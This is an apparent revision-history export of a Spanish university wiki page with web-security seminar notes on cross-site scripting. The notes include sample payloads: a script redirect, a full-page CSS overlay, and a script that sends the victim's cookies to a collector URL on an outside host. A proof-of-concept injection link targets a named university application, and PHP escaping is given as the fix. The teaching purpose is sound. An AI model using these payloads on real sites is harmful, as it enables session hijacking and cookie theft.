WikiJuanan - SeminarioSeguridadWeb
http://wiki.us.es/juanan/wakka.php?wakka=SeminarioSeguridadWeb
History/revisions of WikiJuanan/SeminarioSeguridadWeb
en-us
-
2007-06-21 08:33:14
http://wiki.us.es/juanan/wakka.php?wakka=SeminarioSeguridadWeb/show&time=2007-06-21+08%3A33%3A14
<a name="p1689-1"></a><p class="auto" id="p1689-1"><a name="seguridadinformatica" href="http://wiki.us.es/juanan/wakka.php?wakka=SeguridadInformatica" class="">Seguridad Informática</a> – <a name="seguridadweb" href="http://wiki.us.es/juanan/wakka.php?wakka=SeguridadWeb" class="">Seguridad Web</a></p><hr noshade="noshade" size="1" /><a name="p1689-2"></a><p class="auto" id="p1689-2">
Lo más importante en seguridad web es <strong>validarlo todo</strong> y dejar siempre la seguridad en el lado del servidor y nunca del cliente.</p><br /><a name="p1689-3"></a><p class="auto" id="p1689-3">
Hay que validar la entrada desde formularios, lo que viene en la url, etc</p><a name="h1689-1"></a><h3>Cross Site Scripting (XSS)</h3><a name="p1689-4"></a><p class="auto" id="p1689-4">
Técnicas que permiten obtener información que otra web ha dejado en minavegador, por ejemplo: cookies.<br />
Esto se consigue inyectando código en la aplicación web del otro dominio: html, css, javascript.<br />
Para inyectar código envíamos en el formulario o en la url el código que queramos inyectar, siempre que luego este código se muestre y por tanto se ejecute en la página de la víctima.</p><br /><a name="p1689-5"></a><p class="auto" id="p1689-5">
<strong>Insertando código javascript</strong><br />
<script language='javascript'>location.href='http://www.us.es';</script></p><br /><a name="p1689-6"></a><p class="auto" id="p1689-6">
<strong>Insertando css</strong><br />
<div style="position:absolute;top:0px;left:0px;<span class="nobr">z-order</span>=5000;background-color:red;color:white;width:100%;height:100%;">XSS</div></p><br /><a name="p1689-7"></a><p class="auto" id="p1689-7">
<strong>Leyendo cookies</strong><br />
<script language='javascript'>location.href='<a href="http://10.1.25.52/~palako/forpas/cookie.php?c=" target="_blank" title="Vinculo externo
(en nueva ventana)" class="outerlink"><img src="http://wiki.us.es/juanan/themes/default/icons/web.gif" alt="" border="0" />http://10.1.25.52/~palako/forpas/cookie.php?c=</a>' + document.cookie;</script></p><br /><a name="p1689-8"></a><p class="auto" id="p1689-8">
<strong>Para evitar todo esto</strong><br />
1. Usamos htmlentities<br />
2. En ASP.net también podemos usar la bandera httpOnly en la cookie</p><br /><a name="p1689-9"></a><p class="auto" id="p1689-9">
<strong>En PHP</strong><br />
Para evitar este tipo de vulnerabilidad en una página desarrollada en PHP uno de los métodos que pueden ser utilizados es mediante la función htmlentities() que nos convertirá los caracteres especiales a entidades HTML<br />
<?php<br />
$nuevo = htmlspecialchars("<a>'test'</a>", ENT_QUOTES);<br />
echo $nuevo;<br />
?><br />
Mostrando:<br />
<a>'test'</a></p><br /><a name="p1689-10"></a><p class="auto" id="p1689-10">
Atención a la opción TRACE </p><a name="h1689-2"></a><h2>Caso real icasus</h2><a name="p1689-11"></a><p class="auto" id="p1689-11">
<a href="http://wiki.us.es/icasus11/index.php?aviso=%3Cscript%3Ealert(document.cookie);%3C/script%3E" target="_blank" title="Vinculo externo
(en nueva ventana)" class="outerlink"><img src="http://wiki.us.es/juanan/themes/default/icons/web.gif" alt="" border="0" />http://wiki.us.es/icasus11/index.php?aviso=%3Cscript%3Ealert(document.cookie);%3C/script%3E</a> </p><a name="h1689-3"></a><h2>Enlaces</h2><a name="p1689-12"></a><p class="auto" id="p1689-12">
<a href="http://www.boinasnegras.com/" target="_blank" title="Vinculo externo
(en nueva ventana)" class="outerlink"><img src="http://wiki.us.es/juanan/themes/default/icons/web.gif" alt="" border="0" />http://www.boinasnegras.com/</a> – Retos hacker.<br />
<a href="http://www.noletia.com/forpas.htm" target="_blank" title="Vinculo externo
(en nueva ventana)" class="outerlink"><img src="http://wiki.us.es/juanan/themes/default/icons/web.gif" alt="" border="0" />http://www.noletia.com/forpas.htm</a></p>
-
2006-07-03 09:09:37
http://wiki.us.es/juanan/wakka.php?wakka=SeminarioSeguridadWeb/show&time=2006-07-03+09%3A09%3A37
edited by JuananRuiz
-
2006-06-07 13:10:01
http://wiki.us.es/juanan/wakka.php?wakka=SeminarioSeguridadWeb/show&time=2006-06-07+13%3A10%3A01
edited by JuananRuiz
-
2006-04-19 20:34:34
http://wiki.us.es/juanan/wakka.php?wakka=SeminarioSeguridadWeb/show&time=2006-04-19+20%3A34%3A34
edited by JuananRuiz
-
2006-04-19 20:11:19
http://wiki.us.es/juanan/wakka.php?wakka=SeminarioSeguridadWeb/show&time=2006-04-19+20%3A11%3A19
edited by JuananRuiz
-
2006-04-19 20:01:10
http://wiki.us.es/juanan/wakka.php?wakka=SeminarioSeguridadWeb/show&time=2006-04-19+20%3A01%3A10
edited by JuananRuiz
-
2006-04-19 19:50:15
http://wiki.us.es/juanan/wakka.php?wakka=SeminarioSeguridadWeb/show&time=2006-04-19+19%3A50%3A15
edited by JuananRuiz
-
2006-04-19 19:44:55
http://wiki.us.es/juanan/wakka.php?wakka=SeminarioSeguridadWeb/show&time=2006-04-19+19%3A44%3A55
edited by JuananRuiz
-
2006-04-19 19:31:03
http://wiki.us.es/juanan/wakka.php?wakka=SeminarioSeguridadWeb/show&time=2006-04-19+19%3A31%3A03
edited by JuananRuiz
-
2006-04-19 17:27:28
http://wiki.us.es/juanan/wakka.php?wakka=SeminarioSeguridadWeb/show&time=2006-04-19+17%3A27%3A28
edited by JuananRuiz
-
2006-04-19 17:24:39
http://wiki.us.es/juanan/wakka.php?wakka=SeminarioSeguridadWeb/show&time=2006-04-19+17%3A24%3A39
edited by JuananRuiz
-
2006-04-19 17:22:41
http://wiki.us.es/juanan/wakka.php?wakka=SeminarioSeguridadWeb/show&time=2006-04-19+17%3A22%3A41
edited by JuananRuiz
-
2006-04-19 17:19:44
http://wiki.us.es/juanan/wakka.php?wakka=SeminarioSeguridadWeb/show&time=2006-04-19+17%3A19%3A44
edited by JuananRuiz